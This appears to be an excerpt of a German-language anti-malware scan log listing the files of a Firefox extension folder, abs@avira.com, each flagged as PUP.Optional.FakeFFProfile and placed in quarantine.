PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_gloss-wave_35_f6a828_500x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_highlight-soft_100_eeeeee_1x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_highlight-soft_75_ffe45c_1x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_222222_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_228ef1_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_ef8c08_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_ffd27a_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-icons_ffffff_256x240.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\dnt-api\background.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\blocked.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\locale.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\top.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Alien.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\on_off_switch.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\setting.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Top.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\blocked\message.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\blocked-count.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Carousel.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Classification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\close_indicator.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\faq.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Feedback.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\FeedbackLink.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\help.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\SearchClassification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Settings.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Trackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\alternatives.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\PUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\PUAPage.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\SearchPUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Classification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Close.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Dash.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Domain.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Feedback.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\PUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\PUAPage.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\SearchClassification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\SearchPUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Settings.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Trackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Classification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Feedback.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\HowToEditTrackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Offers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\TinyTopViewTour.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Trackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\de-DE.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\en-US.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\es-ES.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\fr-FR.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\it-IT.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\pt-BR.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_logo.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\close.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\expand-arrow.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\absb-attention.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\absb-checks.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\absb-close.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\abs_avira_umbrella_white.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon128.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon16.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon24.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon32.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon48.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_logo.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_logo32.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_safe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_safe_lg.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_unsafe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_unsafe_lg.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\close-offers-bar.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_close.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_close_white.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_feedback.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_dark.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_dark.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_light.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_light.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_normal.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\info_empty.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\info_full.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\pua-icon.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\question-mark.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\scroll-down.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\serp_info_safe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\serp_info_unsafe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\serp_info_warning.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\settings-24.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\switch-on.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\trackers_icon.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\trackers_icon_nb.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\warning.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\white_check.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\blocked.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\init.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\background\background.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\app.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\content.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\locale.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
